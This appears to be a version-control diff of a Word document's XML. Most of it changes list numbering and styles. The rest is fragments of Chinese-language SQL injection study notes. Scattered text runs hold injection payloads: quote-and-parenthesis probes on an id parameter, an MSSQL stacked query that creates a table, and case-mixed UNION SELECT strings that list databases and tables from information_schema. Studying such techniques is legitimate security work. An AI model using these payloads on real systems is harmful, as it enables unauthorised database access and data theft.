-  <w:abstractNum w:abstractNumId="7" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="9" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="2CAC7825"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="60F0583C"/>
@@ -27625,7 +29892,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="8" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="10" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="34427BD0"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="731EBE66"/>
@@ -27714,7 +29981,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="9" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="11" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="35DB5595"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="F20E9C24"/>
@@ -27800,7 +30067,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="10" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="12" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="3874685D"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="E7C2855E"/>
@@ -27886,7 +30153,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="11" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="13" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="3F2D5BDA"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="6DDE71A4"/>
@@ -27975,11 +30242,11 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="12" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="14" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="437D624A"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
-    <w:tmpl w:val="037E70A0"/>
-    <w:lvl w:ilvl="0" w:tplc="39222AAC">
+    <w:tmpl w:val="2A34540E"/>
+    <w:lvl w:ilvl="0" w:tplc="F216EFF4">
       <w:start w:val="1"/>
       <w:numFmt w:val="decimal"/>
       <w:pStyle w:val="2"/>
@@ -28066,7 +30333,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="13" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="15" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="4A765A37"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="662617A4"/>
@@ -28152,7 +30419,93 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="14" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="16" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="4C6634AE"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="62BC4C5E"/>
+    <w:lvl w:ilvl="0" w:tplc="0409000F">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="420" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%2)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="840" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="1260" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="0409000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1680" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2100" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="2520" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="0409000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2940" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3360" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="3780" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="17" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="4D847848"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="731EBE66"/>
@@ -28241,7 +30594,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="15" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="18" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="4FF11784"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="19308F8C"/>
@@ -28330,7 +30683,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="16" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="19" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="539957E9"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="147ACC88"/>
@@ -28419,7 +30772,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="17" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="20" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="55486479"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="080AD106"/>
@@ -28505,7 +30858,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="18" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="21" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="575A5629"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="7510444E"/>
@@ -28594,7 +30947,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="19" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="22" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="5CA16929"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="2280DE88"/>
@@ -28707,7 +31060,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="20" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="23" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="5FE35CA2"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="3F1EDDC0"/>
@@ -28796,7 +31149,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="21" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="24" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="607C337B"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="71F67F54"/>
@@ -28882,7 +31235,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="22" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="25" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="68990C3B"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="6BB2EDDC"/>
@@ -28971,7 +31324,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="23" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="26" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="6C861650"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="4EBE492C"/>
@@ -29057,7 +31410,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="24" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="27" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="6CEF4BAE"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="29F87372"/>
@@ -29143,10 +31496,10 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="25" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="28" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="6F863464"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
-    <w:tmpl w:val="53B6E1FE"/>
+    <w:tmpl w:val="AD0ADC7A"/>
     <w:lvl w:ilvl="0" w:tplc="0409000F">
       <w:start w:val="1"/>
       <w:numFmt w:val="decimal"/>
@@ -29229,7 +31582,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="26" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="29" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="7D532399"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="731EBE66"/>
@@ -29319,153 +31672,176 @@
     </w:lvl>
   </w:abstractNum>
   <w:num w:numId="1">
-    <w:abstractNumId w:val="22"/>
+    <w:abstractNumId w:val="25"/>
   </w:num>
   <w:num w:numId="2">
-    <w:abstractNumId w:val="25"/>
+    <w:abstractNumId w:val="28"/>
   </w:num>
   <w:num w:numId="3">
+    <w:abstractNumId w:val="6"/>
+  </w:num>
+  <w:num w:numId="4">
+    <w:abstractNumId w:val="3"/>
+  </w:num>
+  <w:num w:numId="5">
+    <w:abstractNumId w:val="20"/>
+  </w:num>
+  <w:num w:numId="6">
     <w:abstractNumId w:val="4"/>
   </w:num>
-  <w:num w:numId="4">
-    <w:abstractNumId w:val="2"/>
-  </w:num>
-  <w:num w:numId="5">
-    <w:abstractNumId w:val="17"/>
-  </w:num>
-  <w:num w:numId="6">
-    <w:abstractNumId w:val="3"/>
-  </w:num>
   <w:num w:numId="7">
-    <w:abstractNumId w:val="23"/>
+    <w:abstractNumId w:val="26"/>
   </w:num>
   <w:num w:numId="8">
-    <w:abstractNumId w:val="10"/>
+    <w:abstractNumId w:val="12"/>
   </w:num>
   <w:num w:numId="9">
-    <w:abstractNumId w:val="21"/>
+    <w:abstractNumId w:val="24"/>
   </w:num>
   <w:num w:numId="10">
-    <w:abstractNumId w:val="24"/>
+    <w:abstractNumId w:val="27"/>
   </w:num>
   <w:num w:numId="11">
-    <w:abstractNumId w:val="16"/>
+    <w:abstractNumId w:val="19"/>
   </w:num>
   <w:num w:numId="12">
-    <w:abstractNumId w:val="11"/>
+    <w:abstractNumId w:val="13"/>
   </w:num>
   <w:num w:numId="13">
     <w:abstractNumId w:val="0"/>
   </w:num>
   <w:num w:numId="14">
-    <w:abstractNumId w:val="12"/>
+    <w:abstractNumId w:val="14"/>
   </w:num>
   <w:num w:numId="15">
+    <w:abstractNumId w:val="9"/>
+  </w:num>
+  <w:num w:numId="16">
+    <w:abstractNumId w:val="8"/>
+  </w:num>
+  <w:num w:numId="17">
+    <w:abstractNumId w:val="23"/>
+  </w:num>
+  <w:num w:numId="18">
+    <w:abstractNumId w:val="18"/>
+  </w:num>
+  <w:num w:numId="19">
     <w:abstractNumId w:val="7"/>
   </w:num>
-  <w:num w:numId="16">
-    <w:abstractNumId w:val="6"/>
-  </w:num>
-  <w:num w:numId="17">
-    <w:abstractNumId w:val="20"/>
-  </w:num>
-  <w:num w:numId="18">
-    <w:abstractNumId w:val="15"/>
-  </w:num>
-  <w:num w:numId="19">
-    <w:abstractNumId w:val="5"/>
-  </w:num>
   <w:num w:numId="20">
-    <w:abstractNumId w:val="18"/>
+    <w:abstractNumId w:val="21"/>
   </w:num>
   <w:num w:numId="21">
-    <w:abstractNumId w:val="12"/>
+    <w:abstractNumId w:val="14"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="22">
-    <w:abstractNumId w:val="12"/>
+    <w:abstractNumId w:val="14"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="23">
-    <w:abstractNumId w:val="12"/>
+    <w:abstractNumId w:val="14"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="24">
-    <w:abstractNumId w:val="13"/>
+    <w:abstractNumId w:val="15"/>
   </w:num>
   <w:num w:numId="25">
-    <w:abstractNumId w:val="9"/>
+    <w:abstractNumId w:val="11"/>
   </w:num>
   <w:num w:numId="26">
-    <w:abstractNumId w:val="12"/>
+    <w:abstractNumId w:val="14"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="27">
-    <w:abstractNumId w:val="8"/>
+    <w:abstractNumId w:val="10"/>
   </w:num>
   <w:num w:numId="28">
-    <w:abstractNumId w:val="26"/>
+    <w:abstractNumId w:val="29"/>
   </w:num>
   <w:num w:numId="29">
-    <w:abstractNumId w:val="14"/>
+    <w:abstractNumId w:val="17"/>
   </w:num>
   <w:num w:numId="30">
-    <w:abstractNumId w:val="12"/>
+    <w:abstractNumId w:val="14"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="31">
-    <w:abstractNumId w:val="12"/>
+    <w:abstractNumId w:val="14"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="32">
-    <w:abstractNumId w:val="12"/>
+    <w:abstractNumId w:val="14"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="33">
-    <w:abstractNumId w:val="12"/>
+    <w:abstractNumId w:val="14"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="34">
-    <w:abstractNumId w:val="12"/>
+    <w:abstractNumId w:val="14"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="35">
-    <w:abstractNumId w:val="19"/>
+    <w:abstractNumId w:val="22"/>
   </w:num>
   <w:num w:numId="36">
     <w:abstractNumId w:val="1"/>
   </w:num>
   <w:num w:numId="37">
-    <w:abstractNumId w:val="12"/>
+    <w:abstractNumId w:val="14"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="38">
-    <w:abstractNumId w:val="12"/>
+    <w:abstractNumId w:val="14"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
   </w:num>
+  <w:num w:numId="39">
+    <w:abstractNumId w:val="14"/>
+    <w:lvlOverride w:ilvl="0">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+  </w:num>
+  <w:num w:numId="40">
+    <w:abstractNumId w:val="5"/>
+  </w:num>
+  <w:num w:numId="41">
+    <w:abstractNumId w:val="2"/>
+  </w:num>
+  <w:num w:numId="42">
+    <w:abstractNumId w:val="16"/>
+  </w:num>
 </w:numbering>
+</file>
+
+<file path=word/people.xml><?xml version="1.0" encoding="utf-8"?>
+<w15:people xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 wp14">
+  <w15:person w15:author="rj f">
+    <w15:presenceInfo w15:providerId="Windows Live" w15:userId="67624fe346e7e824"/>
+  </w15:person>
+</w15:people>
 </file>
 
 <file path=word/styles.xml><?xml version="1.0" encoding="utf-8"?>
@@ -30091,7 +32467,7 @@
     <w:link w:val="2Char0"/>
     <w:autoRedefine/>
     <w:qFormat/>
-    <w:rsid w:val="00911E7F"/>
+    <w:rsid w:val="00BA22DE"/>
     <w:pPr>
       <w:numPr>
         <w:numId w:val="14"/>
@@ -30168,7 +32544,7 @@
     <w:name w:val="笔记2级标题 Char"/>
     <w:basedOn w:val="2Char"/>
     <w:link w:val="2"/>
-    <w:rsid w:val="00911E7F"/>
+    <w:rsid w:val="00BA22DE"/>
     <w:rPr>
       <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
       <w:b/>
@@ -30409,6 +32785,31 @@
       <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
       <w:sz w:val="24"/>
       <w:szCs w:val="24"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="ab">
+    <w:name w:val="Balloon Text"/>
+    <w:basedOn w:val="a"/>
+    <w:link w:val="Char1"/>
+    <w:uiPriority w:val="99"/>
+    <w:semiHidden/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="008E15BD"/>
+    <w:rPr>
+      <w:sz w:val="18"/>
+      <w:szCs w:val="18"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="Char1">
+    <w:name w:val="批注框文本 Char"/>
+    <w:basedOn w:val="a0"/>
+    <w:link w:val="ab"/>
+    <w:uiPriority w:val="99"/>
+    <w:semiHidden/>
+    <w:rsid w:val="008E15BD"/>
+    <w:rPr>
+      <w:sz w:val="18"/>
+      <w:szCs w:val="18"/>
     </w:rPr>
   </w:style>
 </w:styles>

--- a/2.sql injection/sql注入笔记.docx
+++ b/2.sql injection/sql注入笔记.docx
@@ -449,7 +449,6 @@
         <w:ind w:firstLineChars="0"/>
         <w:rPr>
           <w:ins w:id="15" w:author="rj f" w:date="2017-06-20T11:58:00Z"/>
-          <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
         <w:pPrChange w:id="16" w:author="rj f" w:date="2017-06-20T11:58:00Z">
           <w:pPr>
@@ -463,10 +462,7 @@
       </w:pPr>
       <w:ins w:id="17" w:author="rj f" w:date="2017-06-20T11:58:00Z">
         <w:r>
-          <w:t>id=1)</w:t>
-        </w:r>
-        <w:r>
-          <w:t xml:space="preserve"> and 1=1/2</w:t>
+          <w:t>id=1) and 1=1/2</w:t>
         </w:r>
       </w:ins>
     </w:p>
@@ -493,10 +489,7 @@
       </w:pPr>
       <w:ins w:id="20" w:author="rj f" w:date="2017-06-20T11:58:00Z">
         <w:r>
-          <w:t>id=1))</w:t>
-        </w:r>
-        <w:r>
-          <w:t xml:space="preserve"> and 1=1/2</w:t>
+          <w:t>id=1)) and 1=1/2</w:t>
         </w:r>
       </w:ins>
     </w:p>
@@ -523,10 +516,7 @@
       </w:pPr>
       <w:ins w:id="23" w:author="rj f" w:date="2017-06-20T11:58:00Z">
         <w:r>
-          <w:t>id=1’</w:t>
-        </w:r>
-        <w:r>
-          <w:t xml:space="preserve"> and 1=1/2</w:t>
+          <w:t>id=1’ and 1=1/2</w:t>
         </w:r>
       </w:ins>
     </w:p>
@@ -553,10 +543,7 @@
       </w:pPr>
       <w:ins w:id="26" w:author="rj f" w:date="2017-06-20T11:58:00Z">
         <w:r>
-          <w:t>id=1’)</w:t>
-        </w:r>
-        <w:r>
-          <w:t xml:space="preserve"> and 1=1/2</w:t>
+          <w:t>id=1’) and 1=1/2</w:t>
         </w:r>
       </w:ins>
     </w:p>
@@ -583,10 +570,7 @@
       </w:pPr>
       <w:ins w:id="29" w:author="rj f" w:date="2017-06-20T11:58:00Z">
         <w:r>
-          <w:t>id=1’))</w:t>
-        </w:r>
-        <w:r>
-          <w:t xml:space="preserve"> and 1=1/2</w:t>
+          <w:t>id=1’)) and 1=1/2</w:t>
         </w:r>
       </w:ins>
     </w:p>
@@ -613,10 +597,7 @@
       </w:pPr>
       <w:ins w:id="32" w:author="rj f" w:date="2017-06-20T11:58:00Z">
         <w:r>
-          <w:t>id=1”</w:t>
-        </w:r>
-        <w:r>
-          <w:t xml:space="preserve"> and 1=1/2</w:t>
+          <w:t>id=1” and 1=1/2</w:t>
         </w:r>
       </w:ins>
     </w:p>
@@ -643,10 +624,7 @@
       </w:pPr>
       <w:ins w:id="35" w:author="rj f" w:date="2017-06-20T11:58:00Z">
         <w:r>
-          <w:t>id=1”)</w:t>
-        </w:r>
-        <w:r>
-          <w:t xml:space="preserve"> and 1=1/2</w:t>
+          <w:t>id=1”) and 1=1/2</w:t>
         </w:r>
       </w:ins>
     </w:p>
@@ -673,10 +651,7 @@
       </w:pPr>
       <w:ins w:id="38" w:author="rj f" w:date="2017-06-20T11:58:00Z">
         <w:r>
-          <w:t>id=1”))</w:t>
-        </w:r>
-        <w:r>
-          <w:t xml:space="preserve"> and 1=1/2</w:t>
+          <w:t>id=1”)) and 1=1/2</w:t>
         </w:r>
       </w:ins>
     </w:p>
@@ -728,7 +703,6 @@
         <w:ind w:firstLineChars="0"/>
         <w:rPr>
           <w:ins w:id="43" w:author="rj f" w:date="2017-06-20T11:55:00Z"/>
-          <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
       </w:pPr>
       <w:ins w:id="44" w:author="rj f" w:date="2017-06-20T12:00:00Z">
@@ -1135,15 +1109,7 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:t>12</w:t>
-      </w:r>
-      <w:bookmarkStart w:id="46" w:name="_GoBack"/>
-      <w:bookmarkEnd w:id="46"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>34</w:t>
+        <w:t>1234</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1352,6 +1318,7 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>转换为数字类型（</w:t>
       </w:r>
       <w:r>
@@ -1565,7 +1532,6 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>数据库</w:t>
       </w:r>
       <w:r>
@@ -2229,6 +2195,7 @@
     </w:p>
     <w:p>
       <w:r>
+        <w:lastRenderedPageBreak/>
         <w:tab/>
       </w:r>
       <w:r>
@@ -2324,7 +2291,6 @@
         <w:pStyle w:val="3"/>
       </w:pPr>
       <w:r>
-        <w:lastRenderedPageBreak/>
         <w:t>U</w:t>
       </w:r>
       <w:r>
@@ -2579,6 +2545,10 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="3"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="47"/>
+        </w:numPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -3061,6 +3031,7 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>确认</w:t>
       </w:r>
       <w:r>
@@ -3114,11 +3085,7 @@
         <w:ind w:left="1680"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">;create table temp(dir nvarchar(255),depth varchar(255),files varchar(255),ID </w:t>
-      </w:r>
-      <w:r>
-        <w:lastRenderedPageBreak/>
-        <w:t>int NOT NULL IDENTITY(1,1));--</w:t>
+        <w:t>;create table temp(dir nvarchar(255),depth varchar(255),files varchar(255),ID int NOT NULL IDENTITY(1,1));--</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3348,6 +3315,10 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="3"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="48"/>
+        </w:numPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -3862,6 +3833,7 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>MySQL</w:t>
       </w:r>
       <w:r>
@@ -3971,7 +3943,6 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:tab/>
       </w:r>
       <w:r>
@@ -4387,6 +4358,10 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="3"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="49"/>
+        </w:numPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -4569,7 +4544,11 @@
         <w:ind w:firstLineChars="0"/>
       </w:pPr>
       <w:r>
-        <w:t>aNd 1=2 uNion SelEct 1,2,gRoUp_coNcAt(SCHEMA_NAME),4,5  fRom infoRmation_schema.schemata#</w:t>
+        <w:t xml:space="preserve">aNd 1=2 uNion SelEct 1,2,gRoUp_coNcAt(SCHEMA_NAME),4,5  fRom </w:t>
+      </w:r>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t>infoRmation_schema.schemata#</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4637,11 +4616,7 @@
         <w:ind w:firstLineChars="0"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">and 1=2 union select 1,group_concat(table_name),3,4 from </w:t>
-      </w:r>
-      <w:r>
-        <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">information_schema.tables where table_schema=database()  </w:t>
+        <w:t xml:space="preserve">and 1=2 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=database()  </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5426,6 +5401,10 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="3"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="50"/>
+        </w:numPr>
       </w:pPr>
       <w:r>
         <w:t>R</w:t>
@@ -5587,6 +5566,7 @@
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
               </w:rPr>
+              <w:lastRenderedPageBreak/>
               <w:t>名称</w:t>
             </w:r>
           </w:p>
@@ -6158,17 +6138,7 @@
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
               </w:rPr>
-              <w:t>每个进程中最大的连接数，包括持</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
-                <w:color w:val="000000"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:lastRenderedPageBreak/>
-              <w:t>久连接。</w:t>
+              <w:t>每个进程中最大的连接数，包括持久连接。</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -6206,7 +6176,6 @@
